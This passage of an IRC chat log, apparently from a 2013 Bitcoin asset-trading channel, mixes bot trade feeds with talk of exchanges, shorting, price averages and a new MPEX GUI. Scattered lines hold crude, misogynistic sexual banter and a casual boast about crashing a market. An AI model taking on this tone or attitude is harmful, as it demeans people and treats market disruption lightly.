adjusting the states :) Mar 17 05:27:59 sats Mar 17 05:28:09 fuck, im not even going to try and type anymore... Mar 17 05:28:32 When you can't succeed... quit Mar 17 05:30:37 ;D Mar 17 05:30:52 Namworld are you looking at daily average volume ? Mar 17 05:31:30 aye? Mar 17 05:31:47 that and daily volume on specifics Mar 17 05:32:02 but... daily average volume is the daily average volume, not the day's volume. Mar 17 05:32:17 like 50k worth of trade happened in one day back in feb iirc Mar 17 05:32:27 I'm looking at both Mar 17 05:32:44 Trades today and daily average. Seems the month is going well. Mar 17 05:33:18 sorta so-so Mar 17 05:33:58 Considering there was a DDoS preventing most of trades for a time, I'd say it's going well. Mar 17 05:35:16 didn;'t really prevent much if you recall. Mar 17 05:35:51 It seemed like there was less trading than usual. Took some time for people to find and start using alternatives. Mar 17 05:36:47 !h Mar 17 05:36:48 List of commands: Mar 17 05:36:49 !t / !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 17 05:36:50 !l / !last (desc: returns last trade values, supported: MPEX, HAVELOCK, BTCTCO) Mar 17 05:36:51 !mp (desc: returns the response from MPEX order) Mar 17 05:37:04 k Mar 17 05:37:28 !k Mar 17 05:37:39 !gtfo Mar 17 05:37:51 !urmom Mar 17 05:38:29 404 not found Mar 17 05:43:33 Alan, a British expatriate saver in Cyprus, told BBC News: "This is robbery and we must get the EU to stop this. Mar 17 05:43:35 lulzy Mar 17 05:49:51 [BTCTC] [COGNITIVE] 1 @ 0.16799 BTC [-] Mar 17 05:50:45 [BTCTC] [BTC-TRADING-PT] 1 @ 0.425 BTC [+] Mar 17 05:51:25 [BTCTC] [GSDPT] 1 @ 0.00511 BTC [+] Mar 17 05:51:27 [BTCTC] [GSDPT] 99 @ 0.00511 = 0.5059 BTC [+] Mar 17 05:52:26 im shocked people ever trusted banks... its their own damn falt Mar 17 05:52:29 fault Mar 17 05:52:44 give someone all your money... not get 1005 back... lol Mar 17 05:53:10 100% Mar 17 05:54:22 [MPEX] [S.MPOE] 2378 @ 0.00072609 = 1.7266 BTC [+] Mar 17 05:55:07 [BTCTC] [BASIC-MINING] 1 @ 0.345 BTC [+] Mar 17 05:55:32 Who has BASIC-MINING shares? Mar 17 05:55:38 not i Mar 17 05:55:46 I want to short those. Mar 17 05:55:56 i want to short everything but asicminer Mar 17 05:56:06 eh Mar 17 05:56:15 and sooner or later, maybe asicminer too :) Mar 17 05:56:30 [BTCTC] [COGNITIVE] 1 @ 0.168 BTC [+] Mar 17 05:56:49 If they keep rolling out better ASICs chips regularly, might not be ever needed. Mar 17 05:57:13 that is the plan Mar 17 05:57:35 im still waiting for inau's asicminer loan Mar 17 05:57:36 iv quit selling, im going to wait until it gets 1.5 btc to sell more Mar 17 05:57:56 i sold ltc, that should give me enough beer money for a while Mar 17 05:59:57 [BTCTC] [BTC-TRADING-PT] 1 @ 0.425 BTC [+] Mar 17 06:05:40 bitbet faq update : http://bitbet.us/faq/ Mar 17 06:07:03 does bitbet have any awards we can trust from fully articlated lorries carrying fleshy sweet stone fruits? Mar 17 06:07:21 we have the milkmans award Mar 17 06:07:25 ah good Mar 17 06:07:55 [BTCTC] [BTC-BOND] 12 @ 0.01 = 0.12 BTC [+] Mar 17 06:08:00 i just might join the fan club Mar 17 06:09:00 the flesy sweet stone fruit Mar 17 06:09:07 could be a pretty decent name for a titty bar Mar 17 06:10:05 i remember an old game we played on 486 i think ... somethink like 'milkman' Mar 17 06:10:09 was a porn thing Mar 17 06:10:19 cant find it on google though Mar 17 06:10:31 maybe it needed the turbo button pressed Mar 17 06:10:37 http://www.milkmanbook.com/ Mar 17 06:10:39 mebbe Mar 17 06:13:13 meh Mar 17 06:13:23 cant find it Mar 17 06:13:35 even with turbo Mar 17 06:16:45 leisure suit paperboy? Mar 17 06:18:57 ;;google reid fleming world toughest milkman Mar 17 06:18:58 Official Reid Fleming, World's Toughest Milkman Web Site—Comics ...: ; Reid Fleming, World's Toughest Milkman #1 by David Boswell: ; Reid Fleming, World's Toughest Milkman—Movie 01 - YouTube: Mar 17 06:19:39 Is milk a scammer? Mar 17 06:19:39 No! While some have claimed that, milk was always honest. Mar 17 06:20:36 naw pigeons Mar 17 06:20:43 wasnt even 3d iirc Mar 17 06:21:32 neither was reid back in the day Mar 17 06:22:58 leisure suit paperboy lmao Mar 17 06:23:11 did anyone even finish larry ? Mar 17 06:23:20 stupid "prophylactics" shit Mar 17 06:29:35 https://bitcointalk.org/index.php?topic=154050.0 Mar 17 06:33:13 [HAVELOCK] [HIM] 7 @ 2 = 14 BTC [+] Mar 17 06:41:18 !l h him Mar 17 06:41:19 Last trade for HIM on HAVELOCK: 2 [+] Mar 17 06:45:57 kakobrekla: hey, might i ask that you add either to topic or to the website something to the effect of "anything you say may be publicly logged." Mar 17 06:46:15 it is?? Mar 17 06:46:52 yes, mircea_popescu makes it a regular habit to quote irc conversations. :) Mar 17 06:46:59 !last btctc btc-bond Mar 17 06:47:00 Last trade for BTC-BOND on BTCTC at 0.01 BTC [+] Mar 17 06:47:14 oh dat. Mar 17 06:47:50 hm i thought this was a public place and such things are expected Mar 17 06:48:01 afaik its actually against freenode tos Mar 17 06:48:04 nothing wrong with that, it is a public channel, but freenode guidelines suggest to put it in topic. Mar 17 06:48:07 unless explicitly stated Mar 17 06:48:12 dub: right Mar 17 06:48:16 well on freenode its expected it will be noted in the topic Mar 17 06:48:46 ill put it on site Mar 17 06:51:33 >- anything you say is public and can be used by anyone Mar 17 06:51:35 is this pleasing? Mar 17 06:52:58 sounds reasonable Mar 17 07:02:06 [BTCTC] [S.DICE-PT] 5 @ 0.004551 = 0.0228 BTC [-] Mar 17 07:03:38 [BTCTC] [GSDPT] 3 @ 0.00441 = 0.0132 BTC [-] Mar 17 07:03:40 [BTCTC] [GSDPT] 800 @ 0.004301 = 3.4408 BTC [-] Mar 17 07:04:23 [BTCTC] [GSDPT] 10 @ 0.0042 = 0.042 BTC [-] Mar 17 07:04:49 !l bt gsdpt Mar 17 07:04:50 Last price for GSDPT on BTCTC was 0.0042 BTC [-] Mar 17 07:05:06 [BTCTC] [GSDPT] 1 @ 0.00409 BTC [-] Mar 17 07:05:47 !l bt gsdpt Mar 17 07:05:48 Last trade for GSDPT on BTCTC was at 0.00409 BTC [-] Mar 17 07:05:58 good enough. Mar 17 07:06:07 [BTCTC] [GSDPT] 300 @ 0.004001 = 1.2003 BTC [-] Mar 17 07:06:22 [BTCTC] [GSDPT] 29 @ 0.003501 = 0.1015 BTC [-] Mar 17 07:10:17 i got bored,"crashed" ktc market, meh Mar 17 07:10:36 http://www.cryptocoincharts.info/period-charts.php?period=today&resolution=hour&pair=ltc-usd&market=btc-e Mar 17 07:16:51 i now have $12,000 usd fiat... what to buy? hmmmm more ltc? Mar 17 07:16:57 wrong box Mar 17 07:23:16 [MPEX] [S.MPOE] 14858 @ 0.00071579 = 10.6352 BTC [-] Mar 17 07:27:08 also in the news http://tech.fortune.cnn.com/2011/06/17/the-clock-is-ticking-on-bitcoin/ Mar 17 07:27:13 [MPEX] [S.MPOE] 3861 @ 0.00071579 = 2.7637 BTC [-] Mar 17 07:29:09 s/news/olds/ Mar 17 07:29:23 old news is my favourite kind. Mar 17 07:29:33 i only read newspaprs after keeping them around for 6-18 months Mar 17 07:30:01 "The people who have made the most are the early adopters who got in at the beginning and stayed with it," says Bruce Wagner, an IT expert who spotted Bitcoin in 2010 Mar 17 07:30:15 lol Mar 17 07:30:26 mircea_popescu: The people who made the most are people who run option emporiums...I wonder who that could be :P Mar 17 07:30:31 he reminds me of matthew w so much Mar 17 07:30:49 thestringpuller i didn't make the most, i just lost the least. Mar 17 07:31:58 http://nerdr.com/bitcoin-exchange-scam-bitcoins-are-worthless/ also pretty funnay. Mar 17 07:32:17 "Sometimes I let the files do this" Mar 17 07:35:35 hrm Mar 17 07:35:40 I just had an idea Mar 17 07:35:48 wouldn't bitcoins be worth infinite money if Mar 17 07:35:58 it was the first currency that made it to mars? Mar 17 07:36:08 ...we plugged one bitcoin into itself ? Mar 17 07:38:01 mircea_popescu: no, that just causes a ground fault and blows the caps Mar 17 07:39:53 infinite money, if it went to a palce where their is no need for money?? Mar 17 07:39:55 wtf? Mar 17 07:40:11 d3 you high? Mar 17 07:47:38 http://polimedia.us/dtng/c/src/136349922034.png bitcoin, a simple explanation. Mar 17 07:48:29 [MPEX] [S.MPOE] 11355 @ 0.00071243 = 8.0896 BTC [-] Mar 17 07:50:43 [MPEX] [S.MPOE] 21421 @ 0.00071579 = 15.3329 BTC [+] Mar 17 07:54:55 [MPEX] [S.MPOE] 16554 @ 0.00071243 = 11.7936 BTC [-] Mar 17 07:54:56 [MPEX] [S.MPOE] 4879 @ 0.00071711 = 3.4988 BTC [+] Mar 17 08:01:12 [MPEX] [S.DICE] 71 @ 0.00530736 = 0.3768 BTC [-] Mar 17 08:01:14 [MPEX] [S.DICE] 1229 @ 0.0051998 = 6.3906 BTC [-] Mar 17 08:02:42 mp Forbidden Mar 17 08:02:42 You don't have permission to access /dtng/c/src/136349922034.png on this server. Mar 17 08:02:43 Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request. Mar 17 08:03:21 um Mar 17 08:03:52 you got rootbanned ? da fuck did you do hmmm ? Mar 17 08:05:57 ? Mar 17 08:06:05 iv never posted on your site Mar 17 08:06:14 i have visited maybe 5 times in my life Mar 17 08:07:36 just clicking links posted in here Mar 17 08:36:37 [BTCTC] [SYNERGY] 1 @ 0.02101 BTC [+] Mar 17 08:36:40 [BTCTC] [SYNERGY] 1 @ 0.02101 BTC [+] Mar 17 08:36:41 [BTCTC] [SYNERGY] 10 @ 0.021001 = 0.21 BTC [-] Mar 17 08:36:43 [BTCTC] [SYNERGY] 2 @ 0.02 = 0.04 BTC [-] Mar 17 08:36:45 [BTCTC] [SYNERGY] 2 @ 0.015 = 0.03 BTC [-] Mar 17 08:45:14 [MPEX] [S.MPOE] 10888 @ 0.00071029 = 7.7336 BTC [-] Mar 17 08:52:09 aa champagne is fucking great Mar 17 08:52:48 what did people do before is what i wanna know. Mar 17 08:54:25 [MPEX] [S.MPOE] 2567 @ 0.00071151 = 1.8264 BTC [+] Mar 17 08:54:27 [MPEX] [S.MPOE] 3183 @ 0.00071848 = 2.2869 BTC [+] Mar 17 09:03:48 LTC getting hammered Mar 17 09:07:33 did i miss anytihng big Mar 17 09:07:36 any more forks Mar 17 09:12:23 i miss anything fun? Mar 17 09:13:10 BTC-E hysteria over :TC Mar 17 09:13:11 LTC Mar 17 09:13:20 yeah, site just went down for me Mar 17 09:13:32 what do you think the rightful price is for ltc now? Mar 17 09:13:55 i think everyone (including myself a little) ran out of money buying in during the wave Mar 17 09:14:01 not to sure, I'll pick some up at 0.9 maybe Mar 17 09:14:12 hows atlantis Mar 17 09:14:14 and now everyone is juust waiting for it to be worth enough to sell off Mar 17 09:14:32 need more buyers Mar 17 09:14:34 and txs Mar 17 09:14:48 it was .013 Mar 17 09:15:02 atlantis looked okay, but i havent gone in to see if they have a market goin in there yet or what Mar 17 09:15:03 then went to 0.01 next time i saw Mar 17 09:21:16 you can trade ltc on BF Mar 17 09:21:16 lol Mar 17 09:22:32 btc-e Mar 17 09:22:40 's been shitty lately Mar 17 09:27:19 ukto i think once you get those couple updates on the ltc page, people will Mar 17 09:27:33 do it before crypto-trade goes live fo sho Mar 17 09:27:47 pm Mar 17 09:40:44 http://www.nydailynews.com/news/crime/pro-poker-wiz-fossilman-busted-prostitution-sting-article-1.1290012 Mar 17 09:40:45 heh. Mar 17 09:46:55 [BTCTC] [ASICMINER-PT] 31 @ 0.9 = 27.9 BTC [+] Mar 17 09:52:51 http://www.youtube.com/watch?v=rpq5ZmANp0k Mar 17 09:53:05 you may have watched it.. but interesting! Mar 17 09:54:38 I have actuially met Greg raymer guess he needs a little too Mar 17 10:03:05 smickles: i'm fine with the new vwap, only using the pastebin one programmatically Mar 17 10:18:34 [BTCTC] [ASICMINER-PT] 7 @ 0.9 = 6.3 BTC [+] Mar 17 10:19:07 wat Mar 17 10:26:15 [HAVELOCK] [KCIM] 1 @ 1.07 BTC [+] Mar 17 10:30:45 options trading now live on bitfunder Mar 17 10:41:03 [BTCTC] [PAJKA.BOND] 32 @ 0.105 = 3.36 BTC [+] Mar 17 10:42:20 http://www.youtube.com/watch?v=A0Yn72QM-lg Mar 17 10:42:26 remember when we were like... young ? Mar 17 10:58:55 https://bitcointalk.org/index.php?topic=130117.msg1633487#msg1633487 Mar 17 11:00:15 [HAVELOCK] [KCIM] 2 @ 1.07 = 2.14 BTC [+] Mar 17 11:00:18 fking btce not working Mar 17 11:00:29 just trade on BF :P Mar 17 11:00:36 now that options tading is live it will get more attention Mar 17 11:01:35 https://www.youtube.com/watch?v=0UKC7iaBKvs I am selling all my BTC Mar 17 11:15:04 ZedsterX: I see your video and raise you another: https://www.youtube.com/watch?v=WAjL_X_ZesE Mar 17 11:15:05 :P Mar 17 11:15:12 the world is ending, bitcoin is good Mar 17 11:15:16 one extreme to the other. :P Mar 17 11:15:30 too late I sold alreay :) Mar 17 11:15:36 already* Mar 17 11:15:39 [BTCTC] [ASICMINER-PT] 1 @ 0.9 BTC [+] Mar 17 11:15:44 Max is my man! Mar 17 11:15:52 hehe Mar 17 11:16:58 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [+] Mar 17 11:31:05 kakobrekla: can you extend assbot with a command to get a text version of http://bitcoin-assets.com/ for those who prefer terminals over websites? Mar 17 11:46:43 [BTCTC] [ASICMINER-PT] 1 @ 0.9 BTC [+] Mar 17 11:49:54 [MPEX] [S.MPOE] 15700 @ 0.00072609 = 11.3996 BTC [+] Mar 17 11:52:27 burnside: LOL Mar 17 11:52:29 nice post timing Mar 17 11:54:21 anyone else getting this message "Unrecognized signature. Please email your public key first." Mar 17 11:54:26 when trying to execute orders to MPEX? Mar 17 11:55:56 are you using the right key (no subkey)? Mar 17 11:56:12 Yes using the same key Mar 17 11:56:20 the only thing I have changed is the key I use to encrypt Mar 17 11:56:27 which I have changed to 2FB7B452 Mar 17 11:56:34 as the old MPEX one expired Mar 17 11:56:52 CFE0F3E1 is the new Mar 17 11:58:02 ah thanks Mar 17 11:58:14 I followed the FAQ, I guess it's not up to date Mar 17 11:58:27 isn;t it ?! Mar 17 11:58:47 http://mpex.co/faq.html#8 Mar 17 11:58:50 it is! Mar 17 11:59:04 not in 3. though Mar 17 11:59:05 "If you wish you may encrypt your key first, use Mircea Popescu's key (gpg --encrypt --armor -r 2FB7B452 also gpg --search-keys "2FB7B452" if gpg complains about not having the key). This will ensure higher anonymity if it justifies the effort for you. Mar 17 11:59:06 " Mar 17 12:00:15 it works now thanks :D Mar 17 12:00:27 ya wekll that's my key, for sending your pubkey over. Mar 17 12:00:38 [BTCTC] [ASICMINER-PT] 5 @ 0.9 = 4.5 BTC [+] Mar 17 12:00:54 sikritly Mar 17 12:10:08 [MPEX] [S.DICE] 2361 @ 0.005 = 11.805 BTC [-] Mar 17 12:10:10 [MPEX] [S.DICE] 6439 @ 0.005 = 32.195 BTC [-] Mar 17 12:12:30 [MPEX] [S.BBET] 300 @ 0.0015 = 0.45 BTC [-] Mar 17 12:39:05 squall got scammed by this dude Mar 17 12:39:10 with lots of apparent rep Mar 17 12:39:33 https://bitcointalk.org/index.php?topic=154124.0 Mar 17 12:43:11 [MPEX] [S.DICE] 13561 @ 0.005 = 67.805 BTC [-] Mar 17 13:02:33 why so many ppl think best way to invest btc is loan it out? Mar 17 13:05:07 jurov why so many ppl think the way to get laid is to trick some chick into it ? Mar 17 13:12:41 how do you trick a girl into sex? Mar 17 13:12:54 assuming no rape? Mar 17 13:19:57 some sort of magic Mar 17 13:20:02 they have seminars and everything. Mar 17 13:21:25 Yes FellowTravelerlowTraveler publishes howto along those lines Mar 17 13:21:44 Yes FellowTraveler publishes howto along those lines Mar 17 13:22:15 arg massive keyboard-lag Mar 17 13:24:18 lolok Mar 17 13:24:23 hmm it isnt mentioned in his bio on monetas site so not sure where the link to it is Mar 17 13:25:08 ot sure if the seminars he flies around to are on same topic or something else Mar 17 13:26:08 The "Chris has seven years of hands-on experience as co-owner and executive of an industry-leading global ecommerce business" might be it, e-commerce as in e-book sales Mar 17 13:29:25 [BTCTC] [ASICMINER-PT] 3 @ 0.9 = 2.7 BTC [+] Mar 17 13:39:44 bfl ship yet? Mar 17 13:40:07 the trick is to get the girl to think that she's tricking you Mar 17 13:40:55 that is a good trick Mar 17 13:43:51 ship? probably in a week or so Mar 17 13:43:54 one unit at most Mar 17 13:47:27 eh. Mar 17 13:50:50 [BTCTC] [COGNITIVE] 1 @ 0.171 BTC [+] Mar 17 13:53:32 [BTCTC] [SYNERGY] 4 @ 0.022001 = 0.088 BTC [+] **** BEGIN LOGGING AT Sun Mar 17 23:56:34 2013 Mar 17 23:56:57 mircea_popescu: i just decided to release the gui w/o platform specific packaging Mar 17 23:57:03 [HAVELOCK] [HIM] 1 @ 1.9 BTC [-] Mar 17 23:57:13 smickles what's that do ? Mar 17 23:57:41 it means that people have to install the requirements first Mar 17 23:57:57 ah Mar 17 23:57:59 smickles, buttons to buy 250k, 750k, 1m shares are missing! Mar 17 23:58:03 why tho ? Mar 17 23:58:08 http://trilema.com/2013/because-most-people-are-idiots-in-spite-of-never-manning-up-and-admitting-to-it/#comment-92381 < which one of you is that ? Mar 17 23:58:51 mircea_popescu: why? because i didn't code the thing in C, and I used libraries Mar 17 23:59:11 smickles it'll cut your windows adoption by like 80% Mar 17 23:59:22 and linux people prefer the cli anyway Mar 18 00:00:17 python doesn't work on my windows 7 Mar 18 00:00:29 I tried idk how many times to get it to work without success. Mar 18 00:00:31 [MPEX] [S.DICE] 200 @ 0.0051 = 1.02 BTC [+] Mar 18 00:00:44 [MPEX] [S.DICE] 50 @ 0.0051 = 0.255 BTC [+] Mar 18 00:00:54 O_o Mar 18 00:01:14 now that sucks. Mar 18 00:01:26 smickles, just make a small linux vm :D Mar 18 00:01:40 lmao Mar 18 00:01:49 smickles , make the line! Mar 18 00:01:57 line is not a linux emulator Mar 18 00:02:30 Line Is Not a linux Emu Lattor! Mar 18 00:02:58 well, basically, there is a good product now, so I'm putting it out there. As time goes on, I'll develop it further, including per platform packaging Mar 18 00:03:06 a ok Mar 18 00:03:12 that's quite different :p Mar 18 00:03:49 mircea_popescu: so the link (since you missed it the first time) is https://smickles.com/mpex-gui/ Mar 18 00:04:22 can i have smickles mpex gui but with pork ? Mar 18 00:04:49 haha what, you have your own irc namechan ? Mar 18 00:05:02 * Now talking on #smickles Mar 18 00:05:02 haha hai! Mar 18 00:05:10 ok this has buttential Mar 18 00:05:13 mircea_popescu: there will be pork in the minecraft version Mar 18 00:05:21 hahaha Mar 18 00:05:29 cool beans smickles. lemme twitter Mar 18 00:05:40 how many licenses sold so far? Mar 18 00:06:21 ;;tslb Mar 18 00:06:23 Time since last block: 1 minute and 22 seconds Mar 18 00:06:38 jurov: in the 10 min since launch? no confirmed sales yet Mar 18 00:06:49 i deliver on 1 confirmation Mar 18 00:07:16 42 Mar 18 00:07:22 So was looking at trading in AM, and it seems their marketcap is ~16-17 million USD? (Using 400,000 shares) Mar 18 00:07:39 bgupta at the current prices about there. Mar 18 00:09:58 seems a bit high considering the uncertainty.. however, it could work out for shareholders if AM can keep their advantage for a little longer than expected. (BFL shipping in volume is the big question mark I guess.) Mar 18 00:10:37 bgupta https://bitcointalk.org/index.php?topic=151265.0 Mar 18 00:10:50 topic pretty much covered there i think Mar 18 00:11:32 thx Mar 18 00:11:45 oh this remind me i wanted to short am via bf options Mar 18 00:12:32 jurov o.0 Mar 18 00:12:44 yea, bitfunder has options nao Mar 18 00:13:07 pity that ukto is "outta here" Mar 18 00:13:14 jurov. I don't think you can sell naked calls, can you? Mar 18 00:13:51 well he can buy puts in any event Mar 18 00:13:52 i have to wrap my head around them first. maybe i'll buy puts instead Mar 18 00:14:38 jurov if there's no market making on the options tho... Mar 18 00:15:11 there are already some offers, but not much Mar 18 00:16:03 you know, it's very funny. all these idiots were like "o, s.mpoe price is not real!!!111" and yet you can borrow 100mn shares right now if you have the credit Mar 18 00:16:29 on the other hand i'd like to borrow 100k asicminer shares and there's no way to do it, all the total volume for the month is like 1k btc which is what bitbet does ffs Mar 18 00:16:34 yet "great investment". Mar 18 00:16:40 bitcoin is basically full of idiots still. Mar 18 00:17:10 no idea about anything whatsoever, from devteam to the newest forum member, virtually all clueless as rocks. Mar 18 00:17:13 you'd like to borrow 50% of the outstanding (tradable shares)?? Good luck with that. Mar 18 00:17:31 bgupta irl i can do that on plenty shitty 20mn venture by monday morning. Mar 18 00:18:09 sure, i can't borrow 1/4 of google float, but that is BECAUSE I DONT HAVE THE CREDIT Mar 18 00:18:14 if i did i could. Mar 18 00:20:51 (and for the record, unlike mpex where the book is actually kept, you have no idea if asicminer sold 400k or 600k or 1.2mn shares in total) Mar 18 00:22:38 I'm guessing one would want to be a bit careful shorting something like AM since you'd be on the hook for paying the btc dividends for the shares you shorted. Mar 18 00:22:52 that's always the case neh ? Mar 18 00:24:16 whats the best way to get btc value Mar 18 00:24:17 ? Mar 18 00:24:25 vwap, 24h avg? Mar 18 00:24:35 obligitory: https://bitcointalk.org/index.php?board=78.0 Mar 18 00:24:48 ;;bc,24hprc Mar 18 00:24:48 Anduck that's what i use Mar 18 00:24:49 46.85 Mar 18 00:24:57 which one ? Mar 18 00:25:05 Anduck: that is the vwap of all exchanges on bitcoincharts Mar 18 00:25:12 what's the application? Mar 18 00:25:19 well usd->btc basicly Mar 18 00:25:25 and i would like the most accurate price Mar 18 00:25:29 Anduck: maybe spot Mar 18 00:25:35 *spot on gox Mar 18 00:25:43 hmm Mar 18 00:25:44 or best bid on gox Mar 18 00:25:52 best bid could work Mar 18 00:26:22 but i think some avg price is better Mar 18 00:26:52 if you're looking for "least likely to be unfair to either party on the long term" price, then i'd go with the 24hour all-exchange vwap Mar 18 00:26:57 which is better, vwap or 24h avg? Mar 18 00:26:58 if you think mpex is a good model, it uses bc,24hprc Mar 18 00:27:03 aight Mar 18 00:27:04 if you're looking for somethingelse then it'd depend on what you;re looking for Mar 18 00:27:39 i'll go with that 24hour vwap, for start mtgox only Mar 18 00:27:55 you know it's trivial to pull tctm's json Mar 18 00:28:09 http://bitcoincharts.com/t/weighted_prices.json Mar 18 00:28:33 hmm Mar 18 00:28:36 ok. thanks Mar 18 00:29:22 so what happened to mtgox volume Mar 18 00:30:05 past 3 days together comes to like... 20% of chainfork day Mar 18 00:31:40 jez, the next volumeous competitior is >10% in size Mar 18 00:31:56 (on bitcoincharts anyway) Mar 18 00:43:49 [BTCTC] [COGNITIVE] 1 @ 0.1977 BTC [-] Mar 18 00:43:52 [BTCTC] [COGNITIVE] 10 @ 0.1978 = 1.978 BTC [+] Mar 18 00:46:31 hey, how much did bitfloor lose ? was it 20k ? Mar 18 00:46:58 13? Mar 18 00:47:28 there's peeps who have a script that compares losses to fees earned since then, iirc Mar 18 00:47:41 24 no ? Mar 18 00:47:44 iirc Mar 18 00:48:12 https://bitcointalk.org/index.php?topic=105819.0 Mar 18 00:48:52 Kernel panic - not syncing: grsec: halting the system due to suspicious kernel crash caused by root Mar 18 00:48:59 so 30k? Mar 18 00:49:01 so it came to my own machines being paranoid Mar 18 00:49:04 against me Mar 18 00:49:19 lol Mar 18 00:52:58 kik Mar 18 00:58:11 [BTCTC] [BASIC-MINING] 2 @ 0.34999 = 0.7 BTC [+] Mar 18 01:05:36 [BTCTC] [PAJKA.BOND] 37 @ 0.105 = 3.885 BTC [+] Mar 18 01:05:39 [BTCTC] [PAJKA.BOND] 58 @ 0.105 = 6.09 BTC [+] Mar 18 01:08:02 [BTCTC] [S.MPOE-PT] 2 @ 0.000709 = 0.0014 BTC [+] Mar 18 01:08:05 [BTCTC] [S.MPOE-PT] 4 @ 0.00071 = 0.0028 BTC [+] Mar 18 01:08:08 [BTCTC] [S.MPOE-PT] 130 @ 0.00071 = 0.0923 BTC [+] Mar 18 01:09:27 deposits flushed. Mar 18 01:10:30 [BTCTC] [ASICMINER-PT] 1 @ 0.88875 BTC [+] Mar 18 01:11:59 [BTCTC] [ASICMINER-PT] 7 @ 0.889 = 6.223 BTC [+] Mar 18 01:14:40 ;;ticker Mar 18 01:14:41 BTCUSD ticker | Best bid: 47.27501, Best ask: 47.35000, Bid-ask spread: 0.07499, Last trade: 47.35000, 24 hour volume: 13728.98363142, 24 hour low: 46.80000, 24 hour high: 47.74000, 24 hour vwap: 47.39847 Mar 18 01:16:33 [BTCTC] [BTC-BOND] 2 @ 0.01 = 0.02 BTC [+] Mar 18 01:17:49 [BTCTC] [GSDPT] 87 @ 0.00499 = 0.4341 BTC [+] Mar 18 01:22:31 ;;eauth mircea_popescu Mar 18 01:22:33 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Mar 18 01:23:09 ;;everify freenode:#bitcoin-otc:c2e04fad23533e2662e326e340ebc54476309fe6d0d7781aceab3d44 Mar 18 01:23:11 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Mar 18 01:24:46 ;;buy 1 "$100 Trader Joe's Gift Certificate" at 2.2 BTC Mar 18 01:24:47 Order id 14061 created. Mar 18 01:24:52 ;;order 14061 Mar 18 01:24:53 Error: "order" is not a valid command. Mar 18 01:26:27 [BTCTC] [ASICMINER-PT] 1 @ 0.889 BTC [+] Mar 18 01:26:36 ;;view 14061 Mar 18 01:26:38 #14061 Sun Mar 17 16:24:47 2013 mircea_popescu BUY 1.0 $100 Trader Joe's Gift Certificate @ 2.2 BTC (None) Mar 18 01:27:02 somebody be a darling and paste that in -otc too. Mar 18 01:33:58 why dont u do it urself..? Mar 18 01:34:31 cause i'm in yurp ? Mar 18 01:34:49 a, on otc ? i don't go in that scumpit sorry. Mar 18 01:35:14 in other news, piuk is moving blockchain towards a proxy model. GOOD. Mar 18 01:38:13 does he mention that on the forums somewhere? have a link? Mar 18 01:40:21 I see it Mar 18 01:46:55 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Mar 18 01:48:21 http://i.imgur.com/adMinya.png Mar 18 01:48:28 does anyone like the coffee cup mpex ? Mar 18 01:49:51 not too shabby Mar 18 01:50:20 why blue and black for buttons? it doesn't really fit Mar 18 01:50:26 ya i was thinking that. Mar 18 01:50:29 hehe Mar 18 01:50:29 cunt pink'd be better. Mar 18 01:50:35 :)) Mar 18 01:50:39 make people really wanna click it you know ? Mar 18 01:50:42 salmon. Mar 18 01:51:50 Blue and Black buttons are terrible. Mar 18 01:52:01 Main logo looks pixelated Mar 18 01:52:38 ooh I didn't know this channel existed. Awesome. Mar 18 01:52:39 whereas the current "Welcome to MPEx" looks clean Mar 18 01:52:43 sorry but it looks like it's from the 90s Mar 18 01:53:02 GoWest: You have been running your blog and twitter for how long and didn't know this channel existed? Mar 18 01:53:10 GoWest hello. Mar 18 01:53:13 This is were all the real shit in BTC finance goes down Mar 18 01:53:24 Welcome! Mar 18 01:53:54 Bugpowder you apparently also missed the memo on the gift horse mouthlooking. Mar 18 01:53:58 must read moar btctalk. Mar 18 01:54:18 I don't need to read moar btctalk, must read less Mar 18 01:54:21 much less Mar 18 01:54:52 much much less. Mar 18 01:54:57 how's life been treatin' ya ? Mar 18 01:54:59 Anyway, besides those two issues with the coffee formatting, it looks good Mar 18 01:55:02 Pretty good Mar 18 01:55:13 Had interview Mar 18 01:55:18 down to 3 candidates Mar 18 01:55:23 can has interview ? can! Mar 18 01:55:24 cool. Mar 18 01:55:26 hopefully going back in 2 weeks Mar 18 01:55:36 i hate these endless interview processes. Mar 18 01:55:37 have a different one lined up for next week Mar 18 01:55:42 i've always made on the spot decisions Mar 18 01:55:51 It's fairly intense Mar 18 01:56:00 In sell mode for 2 days, including dinner Mar 18 01:56:14 err, pitch mode Mar 18 01:56:19 meh, jurov, i just wanted to look at it Mar 18 01:56:25 Hey guys, buy some ZigGap. =) Mar 18 01:56:35 GoWest: are you involved with that? Mar 18 01:56:42 Just a shareholder. Mar 18 01:56:45 ah Mar 18 01:56:56 i always say, dude, shareholders are the best advertising you'll ever get. Mar 18 01:57:04 some people get it. most don't ;/ Mar 18 01:57:13 ima quote GoWest from now on as a case study :D Mar 18 01:57:18 It really seems to have stagnated, though I think the company has potential. They keep running out of Bitcoins, so obviously business is brisk. Mar 18 01:57:37 everyone that is selling, is running out Mar 18 01:57:40 GoWest you know, if the donut shop always runs out of donuts i don't conclude trade is brisk Mar 18 01:58:03 Fair enough! Mar 18 01:58:19 local poker cash game min buyin is $100 or 2BTC. Mar 18 01:58:20 You're right, I don't know their volume numbers. Mar 18 01:58:22 heh Mar 18 01:58:41 Bugpowder i passed going to a shoot to be here with you all, so... Mar 18 01:58:49 we all gotta make choices in this life! Mar 18 02:00:46 [MPEX] [S.DICE] 350 @ 0.004501 = 1.5754 BTC [-] Mar 18 02:01:54 assbot doesn't support BitFunder? Mar 18 02:02:02 what shoot, mp? Mar 18 02:02:10 and lord, on second thought, why? Mar 18 02:02:29 benkay i think it was ggb Mar 18 02:02:50 ? Mar 18 02:02:59 a girl, another girl and a boy. Mar 18 02:03:04 ah Mar 18 02:03:49 i had my first 4-way last wee Mar 18 02:03:52 week Mar 18 02:04:09 didja have a designated photographer ? :D Mar 18 02:04:10 but i am stupid curious about your life, mp Mar 18 02:04:18 no Mar 18 02:04:28 there was a fifth wheel who limped off to bed though Mar 18 02:04:34 you know, like most bar hopping has a designated driver Mar 18 02:04:40 bbbb? Mar 18 02:04:47 evil bugbowder Mar 18 02:04:58 bitbetbitbet? Mar 18 02:05:26 better bunghole business bureau Mar 18 02:07:05 +1 Mar 